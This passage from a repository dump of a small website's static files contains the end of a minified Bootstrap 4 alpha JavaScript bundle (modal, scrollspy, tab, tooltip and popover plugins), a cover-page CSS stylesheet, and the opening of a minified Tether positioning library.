e=f.supportsTransitionEnd()&&d;if(this._backdrop=document.createElement("div"),this._backdrop.className=r.BACKDROP,d&&a(this._backdrop).addClass(d),a(this._backdrop).appendTo(document.body),a(this._element).on(q.CLICK_DISMISS,function(a){return c._ignoreBackdropClick?void(c._ignoreBackdropClick=!1):void(a.target===a.currentTarget&&("static"===c._config.backdrop?c._element.focus():c.hide()))}),e&&f.reflow(this._backdrop),a(this._backdrop).addClass(r.IN),!b)return;if(!e)return void b();a(this._backdrop).one(f.TRANSITION_END,b).emulateTransitionEnd(m)}else if(!this._isShown&&this._backdrop){a(this._backdrop).removeClass(r.IN);var g=function(){c._removeBackdrop(),b&&b()};f.supportsTransitionEnd()&&a(this._element).hasClass(r.FADE)?a(this._backdrop).one(f.TRANSITION_END,g).emulateTransitionEnd(m):g()}else b&&b()},j.prototype._handleUpdate=function(){this._adjustDialog()},j.prototype._adjustDialog=function(){var a=this._element.scrollHeight>document.documentElement.clientHeight;!this._isBodyOverflowing&&a&&(this._element.style.paddingLeft=this._scrollbarWidth+"px"),this._isBodyOverflowing&&!a&&(this._element.style.paddingRight=this._scrollbarWidth+"px")},j.prototype._resetAdjustments=function(){this._element.style.paddingLeft="",this._element.style.paddingRight=""},j.prototype._checkScrollbar=function(){this._isBodyOverflowing=document.body.clientWidth<window.innerWidth,this._scrollbarWidth=this._getScrollbarWidth()},j.prototype._setScrollbar=function(){var b=parseInt(a(s.FIXED_CONTENT).css("padding-right")||0,10);this._originalBodyPadding=document.body.style.paddingRight||"",this._isBodyOverflowing&&(document.body.style.paddingRight=b+this._scrollbarWidth+"px")},j.prototype._resetScrollbar=function(){document.body.style.paddingRight=this._originalBodyPadding},j.prototype._getScrollbarWidth=function(){var a=document.createElement("div");a.className=r.SCROLLBAR_MEASURER,document.body.appendChild(a);var b=a.offsetWidth-a.clientWidth;return document.body.removeChild(a),b},j._jQueryInterface=function(b,c){return this.each(function(){var e=a(this).data(h),f=a.extend({},j.Default,a(this).data(),"object"===("undefined"==typeof b?"undefined":d(b))&&b);if(e||(e=new j(this,f),a(this).data(h,e)),"string"==typeof b){if(void 0===e[b])throw new Error('No method named "'+b+'"');e[b](c)}else f.show&&e.show(c)})},e(j,null,[{key:"VERSION",get:function(){return g}},{key:"Default",get:function(){return o}}]),j}();return a(document).on(q.CLICK_DATA_API,s.DATA_TOGGLE,function(b){var c=this,d=void 0,e=f.getSelectorFromElement(this);e&&(d=a(e)[0]);var g=a(d).data(h)?"toggle":a.extend({},a(d).data(),a(this).data());"A"===this.tagName&&b.preventDefault();var i=a(d).one(q.SHOW,function(b){b.isDefaultPrevented()||i.one(q.HIDDEN,function(){a(c).is(":visible")&&c.focus()})});t._jQueryInterface.call(a(d),g,this)}),a.fn[b]=t._jQueryInterface,a.fn[b].Constructor=t,a.fn[b].noConflict=function(){return a.fn[b]=k,t._jQueryInterface},t}(jQuery),function(a){var b="scrollspy",g="4.0.0-alpha.5",h="bs.scrollspy",i="."+h,j=".data-api",k=a.fn[b],l={offset:10,method:"auto",target:""},m={offset:"number",method:"string",target:"(string|element)"},n={ACTIVATE:"activate"+i,SCROLL:"scroll"+i,LOAD_DATA_API:"load"+i+j},o={DROPDOWN_ITEM:"dropdown-item",DROPDOWN_MENU:"dropdown-menu",NAV_LINK:"nav-link",NAV:"nav",ACTIVE:"active"},p={DATA_SPY:'[data-spy="scroll"]',ACTIVE:".active",LIST_ITEM:".list-item",LI:"li",LI_DROPDOWN:"li.dropdown",NAV_LINKS:".nav-link",DROPDOWN:".dropdown",DROPDOWN_ITEMS:".dropdown-item",DROPDOWN_TOGGLE:".dropdown-toggle"},q={OFFSET:"offset",POSITION:"position"},r=function(){function j(b,d){c(this,j),this._element=b,this._scrollElement="BODY"===b.tagName?window:b,this._config=this._getConfig(d),this._selector=this._config.target+" "+p.NAV_LINKS+","+(this._config.target+" "+p.DROPDOWN_ITEMS),this._offsets=[],this._targets=[],this._activeTarget=null,this._scrollHeight=0,a(this._scrollElement).on(n.SCROLL,a.proxy(this._process,this)),this.refresh(),this._process()}return j.prototype.refresh=function(){var b=this,c=this._scrollElement!==this._scrollElement.window?q.POSITION:q.OFFSET,d="auto"===this._config.method?c:this._config.method,e=d===q.POSITION?this._getScrollTop():0;this._offsets=[],this._targets=[],this._scrollHeight=this._getScrollHeight();var g=a.makeArray(a(this._selector));g.map(function(b){var c=void 0,g=f.getSelectorFromElement(b);return g&&(c=a(g)[0]),c&&(c.offsetWidth||c.offsetHeight)?[a(c)[d]().top+e,g]:null}).filter(function(a){return a}).sort(function(a,b){return a[0]-b[0]}).forEach(function(a){b._offsets.push(a[0]),b._targets.push(a[1])})},j.prototype.dispose=function(){a.removeData(this._element,h),a(this._scrollElement).off(i),this._element=null,this._scrollElement=null,this._config=null,this._selector=null,this._offsets=null,this._targets=null,this._activeTarget=null,this._scrollHeight=null},j.prototype._getConfig=function(c){if(c=a.extend({},l,c),"string"!=typeof c.target){var d=a(c.target).attr("id");d||(d=f.getUID(b),a(c.target).attr("id",d)),c.target="#"+d}return f.typeCheckConfig(b,c,m),c},j.prototype._getScrollTop=function(){return this._scrollElement===window?this._scrollElement.scrollY:this._scrollElement.scrollTop},j.prototype._getScrollHeight=function(){return this._scrollElement.scrollHeight||Math.max(document.body.scrollHeight,document.documentElement.scrollHeight)},j.prototype._process=function(){var a=this._getScrollTop()+this._config.offset,b=this._getScrollHeight(),c=this._config.offset+b-this._scrollElement.offsetHeight;if(this._scrollHeight!==b&&this.refresh(),a>=c){var d=this._targets[this._targets.length-1];this._activeTarget!==d&&this._activate(d)}if(this._activeTarget&&a<this._offsets[0])return this._activeTarget=null,void this._clear();for(var e=this._offsets.length;e--;){var f=this._activeTarget!==this._targets[e]&&a>=this._offsets[e]&&(void 0===this._offsets[e+1]||a<this._offsets[e+1]);f&&this._activate(this._targets[e])}},j.prototype._activate=function(b){this._activeTarget=b,this._clear();var c=this._selector.split(",");c=c.map(function(a){return a+'[data-target="'+b+'"],'+(a+'[href="'+b+'"]')});var d=a(c.join(","));d.hasClass(o.DROPDOWN_ITEM)?(d.closest(p.DROPDOWN).find(p.DROPDOWN_TOGGLE).addClass(o.ACTIVE),d.addClass(o.ACTIVE)):d.parents(p.LI).find(p.NAV_LINKS).addClass(o.ACTIVE),a(this._scrollElement).trigger(n.ACTIVATE,{relatedTarget:b})},j.prototype._clear=function(){a(this._selector).filter(p.ACTIVE).removeClass(o.ACTIVE)},j._jQueryInterface=function(b){return this.each(function(){var c=a(this).data(h),e="object"===("undefined"==typeof b?"undefined":d(b))&&b||null;if(c||(c=new j(this,e),a(this).data(h,c)),"string"==typeof b){if(void 0===c[b])throw new Error('No method named "'+b+'"');c[b]()}})},e(j,null,[{key:"VERSION",get:function(){return g}},{key:"Default",get:function(){return l}}]),j}();return a(window).on(n.LOAD_DATA_API,function(){for(var b=a.makeArray(a(p.DATA_SPY)),c=b.length;c--;){var d=a(b[c]);r._jQueryInterface.call(d,d.data())}}),a.fn[b]=r._jQueryInterface,a.fn[b].Constructor=r,a.fn[b].noConflict=function(){return a.fn[b]=k,r._jQueryInterface},r}(jQuery),function(a){var b="tab",d="4.0.0-alpha.5",g="bs.tab",h="."+g,i=".data-api",j=a.fn[b],k=150,l={HIDE:"hide"+h,HIDDEN:"hidden"+h,SHOW:"show"+h,SHOWN:"shown"+h,CLICK_DATA_API:"click"+h+i},m={DROPDOWN_MENU:"dropdown-menu",ACTIVE:"active",FADE:"fade",IN:"in"},n={A:"a",LI:"li",DROPDOWN:".dropdown",UL:"ul:not(.dropdown-menu)",FADE_CHILD:"> .nav-item .fade, > .fade",ACTIVE:".active",ACTIVE_CHILD:"> .nav-item > .active, > .active",DATA_TOGGLE:'[data-toggle="tab"], [data-toggle="pill"]',
7 | DROPDOWN_TOGGLE:".dropdown-toggle",DROPDOWN_ACTIVE_CHILD:"> .dropdown-menu .active"},o=function(){function b(a){c(this,b),this._element=a}return b.prototype.show=function(){var b=this;if(!this._element.parentNode||this._element.parentNode.nodeType!==Node.ELEMENT_NODE||!a(this._element).hasClass(m.ACTIVE)){var c=void 0,d=void 0,e=a(this._element).closest(n.UL)[0],g=f.getSelectorFromElement(this._element);e&&(d=a.makeArray(a(e).find(n.ACTIVE)),d=d[d.length-1]);var h=a.Event(l.HIDE,{relatedTarget:this._element}),i=a.Event(l.SHOW,{relatedTarget:d});if(d&&a(d).trigger(h),a(this._element).trigger(i),!i.isDefaultPrevented()&&!h.isDefaultPrevented()){g&&(c=a(g)[0]),this._activate(this._element,e);var j=function(){var c=a.Event(l.HIDDEN,{relatedTarget:b._element}),e=a.Event(l.SHOWN,{relatedTarget:d});a(d).trigger(c),a(b._element).trigger(e)};c?this._activate(c,c.parentNode,j):j()}}},b.prototype.dispose=function(){a.removeClass(this._element,g),this._element=null},b.prototype._activate=function(b,c,d){var e=a(c).find(n.ACTIVE_CHILD)[0],g=d&&f.supportsTransitionEnd()&&(e&&a(e).hasClass(m.FADE)||Boolean(a(c).find(n.FADE_CHILD)[0])),h=a.proxy(this._transitionComplete,this,b,e,g,d);e&&g?a(e).one(f.TRANSITION_END,h).emulateTransitionEnd(k):h(),e&&a(e).removeClass(m.IN)},b.prototype._transitionComplete=function(b,c,d,e){if(c){a(c).removeClass(m.ACTIVE);var g=a(c).find(n.DROPDOWN_ACTIVE_CHILD)[0];g&&a(g).removeClass(m.ACTIVE),c.setAttribute("aria-expanded",!1)}if(a(b).addClass(m.ACTIVE),b.setAttribute("aria-expanded",!0),d?(f.reflow(b),a(b).addClass(m.IN)):a(b).removeClass(m.FADE),b.parentNode&&a(b.parentNode).hasClass(m.DROPDOWN_MENU)){var h=a(b).closest(n.DROPDOWN)[0];h&&a(h).find(n.DROPDOWN_TOGGLE).addClass(m.ACTIVE),b.setAttribute("aria-expanded",!0)}e&&e()},b._jQueryInterface=function(c){return this.each(function(){var d=a(this),e=d.data(g);if(e||(e=e=new b(this),d.data(g,e)),"string"==typeof c){if(void 0===e[c])throw new Error('No method named "'+c+'"');e[c]()}})},e(b,null,[{key:"VERSION",get:function(){return d}}]),b}();return a(document).on(l.CLICK_DATA_API,n.DATA_TOGGLE,function(b){b.preventDefault(),o._jQueryInterface.call(a(this),"show")}),a.fn[b]=o._jQueryInterface,a.fn[b].Constructor=o,a.fn[b].noConflict=function(){return a.fn[b]=j,o._jQueryInterface},o}(jQuery),function(a){if(void 0===window.Tether)throw new Error("Bootstrap tooltips require Tether (http://tether.io/)");var b="tooltip",g="4.0.0-alpha.5",h="bs.tooltip",i="."+h,j=a.fn[b],k=150,l="bs-tether",m={animation:!0,template:'<div class="tooltip" role="tooltip"><div class="tooltip-inner"></div></div>',trigger:"hover focus",title:"",delay:0,html:!1,selector:!1,placement:"top",offset:"0 0",constraints:[]},n={animation:"boolean",template:"string",title:"(string|element|function)",trigger:"string",delay:"(number|object)",html:"boolean",selector:"(string|boolean)",placement:"(string|function)",offset:"string",constraints:"array"},o={TOP:"bottom center",RIGHT:"middle left",BOTTOM:"top center",LEFT:"middle right"},p={IN:"in",OUT:"out"},q={HIDE:"hide"+i,HIDDEN:"hidden"+i,SHOW:"show"+i,SHOWN:"shown"+i,INSERTED:"inserted"+i,CLICK:"click"+i,FOCUSIN:"focusin"+i,FOCUSOUT:"focusout"+i,MOUSEENTER:"mouseenter"+i,MOUSELEAVE:"mouseleave"+i},r={FADE:"fade",IN:"in"},s={TOOLTIP:".tooltip",TOOLTIP_INNER:".tooltip-inner"},t={element:!1,enabled:!1},u={HOVER:"hover",FOCUS:"focus",CLICK:"click",MANUAL:"manual"},v=function(){function j(a,b){c(this,j),this._isEnabled=!0,this._timeout=0,this._hoverState="",this._activeTrigger={},this._tether=null,this.element=a,this.config=this._getConfig(b),this.tip=null,this._setListeners()}return j.prototype.enable=function(){this._isEnabled=!0},j.prototype.disable=function(){this._isEnabled=!1},j.prototype.toggleEnabled=function(){this._isEnabled=!this._isEnabled},j.prototype.toggle=function(b){if(b){var c=this.constructor.DATA_KEY,d=a(b.currentTarget).data(c);d||(d=new this.constructor(b.currentTarget,this._getDelegateConfig()),a(b.currentTarget).data(c,d)),d._activeTrigger.click=!d._activeTrigger.click,d._isWithActiveTrigger()?d._enter(null,d):d._leave(null,d)}else{if(a(this.getTipElement()).hasClass(r.IN))return void this._leave(null,this);this._enter(null,this)}},j.prototype.dispose=function(){clearTimeout(this._timeout),this.cleanupTether(),a.removeData(this.element,this.constructor.DATA_KEY),a(this.element).off(this.constructor.EVENT_KEY),this.tip&&a(this.tip).remove(),this._isEnabled=null,this._timeout=null,this._hoverState=null,this._activeTrigger=null,this._tether=null,this.element=null,this.config=null,this.tip=null},j.prototype.show=function(){var b=this,c=a.Event(this.constructor.Event.SHOW);if(this.isWithContent()&&this._isEnabled){a(this.element).trigger(c);var d=a.contains(this.element.ownerDocument.documentElement,this.element);if(c.isDefaultPrevented()||!d)return;var e=this.getTipElement(),g=f.getUID(this.constructor.NAME);e.setAttribute("id",g),this.element.setAttribute("aria-describedby",g),this.setContent(),this.config.animation&&a(e).addClass(r.FADE);var h="function"==typeof this.config.placement?this.config.placement.call(this,e,this.element):this.config.placement,i=this._getAttachment(h);a(e).data(this.constructor.DATA_KEY,this).appendTo(document.body),a(this.element).trigger(this.constructor.Event.INSERTED),this._tether=new Tether({attachment:i,element:e,target:this.element,classes:t,classPrefix:l,offset:this.config.offset,constraints:this.config.constraints,addTargetClasses:!1}),f.reflow(e),this._tether.position(),a(e).addClass(r.IN);var k=function(){var c=b._hoverState;b._hoverState=null,a(b.element).trigger(b.constructor.Event.SHOWN),c===p.OUT&&b._leave(null,b)};if(f.supportsTransitionEnd()&&a(this.tip).hasClass(r.FADE))return void a(this.tip).one(f.TRANSITION_END,k).emulateTransitionEnd(j._TRANSITION_DURATION);k()}},j.prototype.hide=function(b){var c=this,d=this.getTipElement(),e=a.Event(this.constructor.Event.HIDE),g=function(){c._hoverState!==p.IN&&d.parentNode&&d.parentNode.removeChild(d),c.element.removeAttribute("aria-describedby"),a(c.element).trigger(c.constructor.Event.HIDDEN),c.cleanupTether(),b&&b()};a(this.element).trigger(e),e.isDefaultPrevented()||(a(d).removeClass(r.IN),f.supportsTransitionEnd()&&a(this.tip).hasClass(r.FADE)?a(d).one(f.TRANSITION_END,g).emulateTransitionEnd(k):g(),this._hoverState="")},j.prototype.isWithContent=function(){return Boolean(this.getTitle())},j.prototype.getTipElement=function(){return this.tip=this.tip||a(this.config.template)[0]},j.prototype.setContent=function(){var b=a(this.getTipElement());this.setElementContent(b.find(s.TOOLTIP_INNER),this.getTitle()),b.removeClass(r.FADE).removeClass(r.IN),this.cleanupTether()},j.prototype.setElementContent=function(b,c){var e=this.config.html;"object"===("undefined"==typeof c?"undefined":d(c))&&(c.nodeType||c.jquery)?e?a(c).parent().is(b)||b.empty().append(c):b.text(a(c).text()):b[e?"html":"text"](c)},j.prototype.getTitle=function(){var a=this.element.getAttribute("data-original-title");return a||(a="function"==typeof this.config.title?this.config.title.call(this.element):this.config.title),a},j.prototype.cleanupTether=function(){this._tether&&this._tether.destroy()},j.prototype._getAttachment=function(a){return o[a.toUpperCase()]},j.prototype._setListeners=function(){var b=this,c=this.config.trigger.split(" ");c.forEach(function(c){if("click"===c)a(b.element).on(b.constructor.Event.CLICK,b.config.selector,a.proxy(b.toggle,b));else if(c!==u.MANUAL){var d=c===u.HOVER?b.constructor.Event.MOUSEENTER:b.constructor.Event.FOCUSIN,e=c===u.HOVER?b.constructor.Event.MOUSELEAVE:b.constructor.Event.FOCUSOUT;a(b.element).on(d,b.config.selector,a.proxy(b._enter,b)).on(e,b.config.selector,a.proxy(b._leave,b))}}),this.config.selector?this.config=a.extend({},this.config,{trigger:"manual",selector:""}):this._fixTitle()},j.prototype._fixTitle=function(){var a=d(this.element.getAttribute("data-original-title"));(this.element.getAttribute("title")||"string"!==a)&&(this.element.setAttribute("data-original-title",this.element.getAttribute("title")||""),this.element.setAttribute("title",""))},j.prototype._enter=function(b,c){var d=this.constructor.DATA_KEY;return c=c||a(b.currentTarget).data(d),c||(c=new this.constructor(b.currentTarget,this._getDelegateConfig()),a(b.currentTarget).data(d,c)),b&&(c._activeTrigger["focusin"===b.type?u.FOCUS:u.HOVER]=!0),a(c.getTipElement()).hasClass(r.IN)||c._hoverState===p.IN?void(c._hoverState=p.IN):(clearTimeout(c._timeout),c._hoverState=p.IN,c.config.delay&&c.config.delay.show?void(c._timeout=setTimeout(function(){c._hoverState===p.IN&&c.show()},c.config.delay.show)):void c.show())},j.prototype._leave=function(b,c){var d=this.constructor.DATA_KEY;if(c=c||a(b.currentTarget).data(d),c||(c=new this.constructor(b.currentTarget,this._getDelegateConfig()),a(b.currentTarget).data(d,c)),b&&(c._activeTrigger["focusout"===b.type?u.FOCUS:u.HOVER]=!1),!c._isWithActiveTrigger())return clearTimeout(c._timeout),c._hoverState=p.OUT,c.config.delay&&c.config.delay.hide?void(c._timeout=setTimeout(function(){c._hoverState===p.OUT&&c.hide()},c.config.delay.hide)):void c.hide()},j.prototype._isWithActiveTrigger=function(){for(var a in this._activeTrigger)if(this._activeTrigger[a])return!0;return!1},j.prototype._getConfig=function(c){return c=a.extend({},this.constructor.Default,a(this.element).data(),c),c.delay&&"number"==typeof c.delay&&(c.delay={show:c.delay,hide:c.delay}),f.typeCheckConfig(b,c,this.constructor.DefaultType),c},j.prototype._getDelegateConfig=function(){var a={};if(this.config)for(var b in this.config)this.constructor.Default[b]!==this.config[b]&&(a[b]=this.config[b]);return a},j._jQueryInterface=function(b){return this.each(function(){var c=a(this).data(h),e="object"===("undefined"==typeof b?"undefined":d(b))?b:null;if((c||!/dispose|hide/.test(b))&&(c||(c=new j(this,e),a(this).data(h,c)),"string"==typeof b)){if(void 0===c[b])throw new Error('No method named "'+b+'"');c[b]()}})},e(j,null,[{key:"VERSION",get:function(){return g}},{key:"Default",get:function(){return m}},{key:"NAME",get:function(){return b}},{key:"DATA_KEY",get:function(){return h}},{key:"Event",get:function(){return q}},{key:"EVENT_KEY",get:function(){return i}},{key:"DefaultType",get:function(){return n}}]),j}();return a.fn[b]=v._jQueryInterface,a.fn[b].Constructor=v,a.fn[b].noConflict=function(){return a.fn[b]=j,v._jQueryInterface},v}(jQuery));(function(f){var h="popover",i="4.0.0-alpha.5",j="bs.popover",k="."+j,l=f.fn[h],m=f.extend({},g.Default,{placement:"right",trigger:"click",content:"",template:'<div class="popover" role="tooltip"><h3 class="popover-title"></h3><div class="popover-content"></div></div>'}),n=f.extend({},g.DefaultType,{content:"(string|element|function)"}),o={FADE:"fade",IN:"in"},p={TITLE:".popover-title",CONTENT:".popover-content"},q={HIDE:"hide"+k,HIDDEN:"hidden"+k,SHOW:"show"+k,SHOWN:"shown"+k,INSERTED:"inserted"+k,CLICK:"click"+k,FOCUSIN:"focusin"+k,FOCUSOUT:"focusout"+k,MOUSEENTER:"mouseenter"+k,MOUSELEAVE:"mouseleave"+k},r=function(g){function l(){return c(this,l),a(this,g.apply(this,arguments))}return b(l,g),l.prototype.isWithContent=function(){return this.getTitle()||this._getContent()},l.prototype.getTipElement=function(){return this.tip=this.tip||f(this.config.template)[0]},l.prototype.setContent=function(){var a=f(this.getTipElement());this.setElementContent(a.find(p.TITLE),this.getTitle()),this.setElementContent(a.find(p.CONTENT),this._getContent()),a.removeClass(o.FADE).removeClass(o.IN),this.cleanupTether()},l.prototype._getContent=function(){return this.element.getAttribute("data-content")||("function"==typeof this.config.content?this.config.content.call(this.element):this.config.content)},l._jQueryInterface=function(a){return this.each(function(){var b=f(this).data(j),c="object"===("undefined"==typeof a?"undefined":d(a))?a:null;if((b||!/destroy|hide/.test(a))&&(b||(b=new l(this,c),f(this).data(j,b)),"string"==typeof a)){if(void 0===b[a])throw new Error('No method named "'+a+'"');b[a]()}})},e(l,null,[{key:"VERSION",get:function(){return i}},{key:"Default",get:function(){return m}},{key:"NAME",get:function(){return h}},{key:"DATA_KEY",get:function(){return j}},{key:"Event",get:function(){return q}},{key:"EVENT_KEY",get:function(){return k}},{key:"DefaultType",get:function(){return n}}]),l}(g);return f.fn[h]=r._jQueryInterface,f.fn[h].Constructor=r,f.fn[h].noConflict=function(){return f.fn[h]=l,r._jQueryInterface},r})(jQuery)}();


--------------------------------------------------------------------------------
/pinacolada_website/static/cover.css:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * Globals
  3 |  */
  4 | 
  5 | /* Links */
  6 | a,
  7 | a:focus,
  8 | a:hover {
  9 |   color: #fff;
 10 | }
 11 | 
 12 | /* Custom default button */
 13 | .btn-secondary,
 14 | .btn-secondary:hover,
 15 | .btn-secondary:focus {
 16 |   color: #333;
 17 |   text-shadow: none; /* Prevent inheritance from `body` */
 18 |   background-color: #fff;
 19 |   border: .05rem solid #fff;
 20 | }
 21 | 
 22 | 
 23 | /*
 24 |  * Base structure
 25 |  */
 26 | 
 27 | html,
 28 | body {
 29 |   height: 100%;
 30 |   background-color: #333;
 31 | }
 32 | body {
 33 |   color: #fff;
 34 |   text-align: center;
 35 |   text-shadow: 0 .05rem .1rem rgba(0,0,0,.5);
 36 | }
 37 | 
 38 | /* Extra markup and styles for table-esque vertical and horizontal centering */
 39 | .site-wrapper {
 40 |   display: table;
 41 |   width: 100%;
 42 |   height: 100%; /* For at least Firefox */
 43 |   min-height: 100%;
 44 |   -webkit-box-shadow: inset 0 0 5rem rgba(0,0,0,.5);
 45 |           box-shadow: inset 0 0 5rem rgba(0,0,0,.5);
 46 | }
 47 | .site-wrapper-inner {
 48 |   display: table-cell;
 49 |   vertical-align: top;
 50 | }
 51 | .cover-container {
 52 |   margin-right: auto;
 53 |   margin-left: auto;
 54 | }
 55 | 
 56 | /* Padding for spacing */
 57 | .inner {
 58 |   padding: 2rem;
 59 | }
 60 | 
 61 | 
 62 | /*
 63 |  * Header
 64 |  */
 65 | 
 66 | .masthead {
 67 |   margin-bottom: 2rem;
 68 | }
 69 | 
 70 | .masthead-brand {
 71 |   margin-bottom: 0;
 72 | }
 73 | 
 74 | .nav-masthead .nav-link {
 75 |   padding: .25rem 0;
 76 |   font-weight: bold;
 77 |   color: rgba(255,255,255,.5);
 78 |   background-color: transparent;
 79 |   border-bottom: .25rem solid transparent;
 80 | }
 81 | 
 82 | .nav-masthead .nav-link:hover,
 83 | .nav-masthead .nav-link:focus {
 84 |   border-bottom-color: rgba(255,255,255,.25);
 85 | }
 86 | 
 87 | .nav-masthead .nav-link + .nav-link {
 88 |   margin-left: 1rem;
 89 | }
 90 | 
 91 | .nav-masthead .active {
 92 |   color: #fff;
 93 |   border-bottom-color: #fff;
 94 | }
 95 | 
 96 | @media (min-width: 48em) {
 97 |   .masthead-brand {
 98 |     float: left;
 99 |   }
100 |   .nav-masthead {
101 |     float: right;
102 |   }
103 | }
104 | 
105 | 
106 | /*
107 |  * Cover
108 |  */
109 | 
110 | .cover {
111 |   padding: 0 1.5rem;
112 | }
113 | .cover .btn-lg {
114 |   padding: .75rem 1.25rem;
115 |   font-weight: bold;
116 | }
117 | 
118 | 
119 | /*
120 |  * Footer
121 |  */
122 | 
123 | .mastfoot {
124 |   color: rgba(255,255,255,.5);
125 | }
126 | 
127 | 
128 | /*
129 |  * Affix and center
130 |  */
131 | 
132 | @media (min-width: 40em) {
133 |   /* Pull out the header and footer */
134 |   .masthead {
135 |     position: fixed;
136 |     top: 0;
137 |   }
138 |   .mastfoot {
139 |     position: fixed;
140 |     bottom: 0;
141 |   }
142 |   /* Start the vertical centering */
143 |   .site-wrapper-inner {
144 |     vertical-align: middle;
145 |   }
146 |   /* Handle the widths */
147 |   .masthead,
148 |   .mastfoot,
149 |   .cover-container {
150 |     width: 100%; /* Must be percentage or pixels for horizontal alignment */
151 |   }
152 | }
153 | 
154 | @media (min-width: 62em) {
155 |   .masthead,
156 |   .mastfoot,
157 |   .cover-container {
158 |     width: 42rem;
159 |   }
160 | }
161 | 


--------------------------------------------------------------------------------
/pinacolada_website/static/tether.min.js:
--------------------------------------------------------------------------------
1 | !function(t,e){"function"==typeof define&&define.amd?define(e):"object"==typeof exports?module.exports=e(require,exports,module):t.Tether=e()}(this,function(t,e,o){"use strict";function n(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function i(t){var e=t.getBoundingClientRect(),o={};for(var n in e)o[n]=e[n];if(t.ownerDocument!==document){var r=t.ownerDocument.defaultView.frameElement;if(r){var s=i(r);o.top+=s.top,o.bottom+=s.top,o.left+=s.left,o.right+=s.left}}return o}function r(t){var e=getComputedStyle(t)||{},o=e.position,n=[];if("fixed"===o)return[t];for(var i=t;(i=i.parentNode)&&i&&1===i.nodeType;){var r=void 0;try{r=getComputedStyle(i)}catch(s){}if("undefined"==typeof r||null===r)return n.push(i),n;var a=r,f=a.overflow,l=a.overflowX,h=a.overflowY;/(auto|scroll)/.test(f+h+l)&&("absolute"!==o||["relative","absolute","fixed"].indexOf(r.position)>=0)&&n.push(i)}return n.push(t.ownerDocument.body),t.ownerDocument!==document&&n.push(t.ownerDocument.defaultView),n}function s(){A&&document.body.removeChild(A),A=null}function a(t){var e=void 0;t===document?(e=document,t=document.documentElement):e=t.ownerDocument;var o=e.documentElement,n=i(t),r=P();return n.top-=r.top,n.left-=r.left,"undefined"==typeof n.width&&(n.width=document.body.scrollWidth-n.left-n.right),"undefined"==typeof n.height&&(n.height=document.body.scrollHeight-n.top-n.bottom),n.top=n.top-o.clientTop,n.left=n.left-o.clientLeft,n.right=e.body.clientWidth-n.width-n.left,n.bottom=e.body.clientHeight-n.height-n.top,n}function f(t){return t.offsetParent||document.documentElement}function l(){if(M)return M;var t=document.createElement("div");t.style.width="100%",t.style.height="200px";var e=document.createElement("div");h(e.style,{position:"absolute",top:0,left:0,pointerEvents:"none",visibility:"hidden",width:"200px",height:"150px",overflow:"hidden"}),e.appendChild(t),document.body.appendChild(e);var o=t.offsetWidth;e.style.overflow="scroll";var n=t.offsetWidth;o===n&&(n=e.clientWidth),document.body.removeChild(e);var i=o-n;return M={width:i,height:i}}function h(){var t=arguments.length<=0||void 0===arguments[0]?{}:arguments[0],e=[];return Array.prototype.push.apply(e,arguments),e.slice(1).forEach(function(e){if(e)for(var o in e)({}).hasOwnProperty.call(e,o)&&(t[o]=e[o])}),t}function d(t,e){if("undefined"!=typeof t.classList)e.split(" ").forEach(function(e){e.trim()&&t.classList.remove(e)});else{var o=new RegExp("(^| )"+e.split(" ").join("|")+"( |$)","gi"),n=c(t).replace(o," ");g(t,n)}}function u(t,e){if("undefined"!=typeof t.classList)e.split(" ").forEach(function(e){e.trim()&&t.classList.add(e)});else{d(t,e);var o=c(t)+(" "+e);g(t,o)}}function p(t,e){if("undefined"!=typeof t.classList)return t.classList.contains(e);var o=c(t);return new RegExp("(^| )"+e+"( |$)","gi").test(o)}function c(t){return t.className instanceof t.ownerDocument.defaultView.SVGAnimatedString?t.className.baseVal:t.className}function g(t,e){t.setAttribute("class",e)}function m(t,e,o){o.forEach(function(o){-1===e.indexOf(o)&&p(t,o)&&d(t,o)}),e.forEach(function(e){p(t,e)||u(t,e)})}function n(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function v(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Super expression must either be null or a function, not "+typeof e);t.prototype=Object.create(e&&e.prototype,{constructor:{value:t,enumerable:!1,writable:!0,configurable:!0}}),e&&(Object.setPrototypeOf?Object.setPrototypeOf(t,e):t.__proto__=e)}function y(t,e){var o=arguments.length<=2||void 0===arguments[2]?1:arguments[2];return t+o>=e&&e>=t-o}function b(){return"undefined"!=typeof performance&&"undefined"!=typeof performance.now?performance.now():+new Date}function w(){for(var t={top:0,left:0},e=arguments.length,o=Array(e),n=0;e>n;n++)o[n]=arguments[n];return o.forEach(function(e){var o=e.top,n=e.left;"string"==typeof o&&(o=parseFloat(o,10)),"string"==typeof n&&(n=parseFloat(n,10)),t.top+=o,t.left+=n}),t}function C(t,e){return"string"==typeof t.left&&-1!==t.left.indexOf("%")&&(t.left=parseFloat(t.left,10)/100*e.width),"string"==typeof t.top&&-1!==t.top.indexOf("%")&&(t.top=parseFloat(t.top,10)/100*e.height),t}function O(t,e){return"scrollParent"===e?e=t.scrollParents[0]:"window"===e&&(e=[pageXOffset,pageYOffset,innerWidth+pageXOffset,innerHeight+pageYOffset]),e===document&&(e=e.documentElement),"undefined"!=typeof e.nodeType&&!function(){var t=e,o=a(e),n=o,i=getComputedStyle(e);if(e=[n.left,n.top,o.width+n.left,o.height+n.top],t.ownerDocument!==document){var r=t.ownerDocument.defaultView;e[0]+=r.pageXOffset,e[1]+=r.pageYOffset,e[2]+=r.pageXOffset,e[3]+=r.pageYOffset}G.forEach(function(t,o){t=t[0].toUpperCase()+t.substr(1),"Top"===t||"Left"===t?e[o]+=parseFloat(i["border"+t+"Width"]):e[o]-=parseFloat(i["border"+t+"Width"])})}(),e}var E=function(){function t(t,e){for(var o=0;o<e.length;o++){var n=e[o];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}return function(e,o,n){return o&&t(e.prototype,o),n&&t(e,n),e}}(),x=void 0;"undefined"==typeof x&&(x={modules:[]});var A=null,T=function(){var t=0;return function(){return++t}}(),S={},P=function(){var t=A;t||(t=document.createElement("div"),t.setAttribute("data-tether-id",T()),h(t.style,{top:0,left:0,position:"absolute"}),document.body.appendChild(t),A=t);var e=t.getAttribute("data-tether-id");return"undefined"==typeof S[e]&&(S[e]=i(t),k(function(){delete S[e]})),S[e]},M=null,W=[],k=function(t){W.push(t)},_=function(){for(var t=void 0;t=W.pop();)t()},B=function(){function t(){n(this,t)}return E(t,[{key:"on",value:function(t,e,o){var n=arguments.length<=3||void 